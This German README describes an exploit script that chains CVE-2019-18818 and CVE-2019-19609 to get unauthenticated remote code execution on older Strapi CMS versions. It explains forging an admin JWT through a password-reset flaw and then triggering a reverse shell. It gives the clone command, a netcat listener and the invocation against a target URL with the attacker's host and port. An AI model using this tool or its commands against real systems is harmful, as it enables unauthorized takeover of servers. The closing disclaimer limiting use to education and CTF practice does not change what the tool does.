
Exploit-Skript, das eine Mischung aus CVE-2019-18818 und CVE-2019-19609 für nicht authentifizierte Remote-Codeausführung in Strapi CMS zeigt.
Exploit-Skript, das eine Mischung aus CVE-2019-18818 und CVE-2019-19609 für nicht authentifizierte Remote-Codeausführung in Strapi CMS demonstriert.
Dieses Skript nutzt eine Sicherheitslücke in Strapi CMS Versionen 3.0.0-beta.17.4 und niedriger aus, die eine nicht authentifizierte Remote-Codeausführung ermöglicht.
Der Exploit nutzt zunächst eine Schwachstelle im Passwort-Reset, um ein JSON Web Token (JWT) für einen administrativen Benutzer zu erhalten. Dieses Token wird dann verwendet, um eine schädliche Nutzlast an das Strapi CMS zu senden, die eine Reverse-Shell zurück zum Rechner des Angreifers auslöst.
Repository klonen:
git clone https://github.com/Hackhoven/Strapi-RCE.git
In das Verzeichnis wechseln
cd Strapi-RCE/
Netcat-Listener einrichten
nc -nlvp <LPORT>
Skript mit der Ziel-URL, der lokalen IP-Adresse und dem lokalen Port als Argumente ausführen
python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
Dieses Skript ist ausschließlich für Bildungszwecke gedacht. Der Autor befürwortet oder unterstützt die Verwendung dieses Skripts für illegale oder unethische Aktivitäten nicht. Dieses Skript sollte nur in legalen Sicherheitsforschungs- oder CTF-Umgebungen verwendet werden. Verwendung auf eigene Gefahr.
Erstellt von Hackhoven